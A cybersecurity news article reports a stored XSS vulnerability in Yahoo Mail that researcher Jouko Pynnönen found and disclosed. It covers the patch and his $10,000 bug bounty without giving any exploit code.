Home > Cyber News > Yahoo Just Fixed Another Scary XSS Bug
CYBER NEWS

Yahoo Just Fixed Another Scary XSS Bug

by   |  Last Update:  |  0 Comments  

yahoo-XSS-STFSecurity experts definitely shiver every time a multinational company is found vulnerable to attacks. Such news stories are never to be underestimated – disclosed vulnerabilities usually leave millions of users prone to exploitation.

Let’s take a glimpse at Yahoo! and the XSS (cross-site scripting) vulnerability that could have enabled bad actors to compromise users’ email accounts by just sending a malicious email. Let’s repeat the last part – to exploit the vulnerability, the only action on behalf of the user is just opening and viewing their email. Nothing more.

Who Discovered the XSS Vulnerability in Yahoo?

A Finnish researcher, Jouko Pynnönen, has discovered and reported the scary bug. This is what the researcher has said in his original post, titled Yahoo Mail Stored XSS:

A stored XSS vulnerability in Yahoo Mail was patched earlier this month. The flaw allowed malicious JavaScript code to be embedded in a specially formatted email message. The code would be automatically evaluated when the message was viewed. The JavaScript could be used to e.g. compromise the account, change its settings, and forward or send email without the user’s consent.

All Versions of Yahoo Affected, Mobile App Aside

Furthermore, the vulnerability in question has affected all versions of Yahoo mail service, the mobile app excluded. One reason that should agitate users is that Yahoo is the second largest email service in the world. Almost 300 million email accounts were registered as of February 2014.

Luckily, Yahoo says that the bug hasn’t been exploited and was fixed on January 6 before anything bad happened.

Jouko Pynnönen has also made a video that illustrates the potential exploit.

Unfortunately, this is not the first XSS bug found in Yahoo, and probably it won’t be the last one. Fortunately, Yahoo, among others, has a bug bounty program that encourages independent researchers to report bugs they discover. For this particular vulnerability report, the Finnish researcher was rewarded $10,000.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:
Twitter

Related posts:
  1. An XSS Bug Found (and Fixed) in Photos.Facebook.com We all love Facebook but do we know how safe...
  2. 6 Cybersecurity Tactics to Protect Against XSS Attacks Cross-site scripting (XSS) is nothing to take lightly. As simultaneously...
  3. XSS Bug Found on Wix.com Platform, Built on Open-Source WordPress Library Have you heard of wix(.)com? Wix.com is a cloud-based web...
  4. Google Releases 2 New Dev Tools to Protect against XSS Google has just released two new tools for developers with...
  5. Attention, There’s an Unpatched Stored XSS Flaw In Apple’s AirTag Apple’s personal item-tracker devices, known as AirTag, can be exploited...
  6. All in One SEO Pack WordPress Plugin Vulnerability Could Allow XSS Attacks All in One SEO Pack is one of the most...
  7. Fix Google Redirects to Yahoo [Ultimate Chrome Guide] Have you ever noticed your Google Chrome browser suddenly switching...
  8. PayPal Patched a Scary Remote Code Execution Bug It’s never good news when vulnerabilities are found in widely...

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree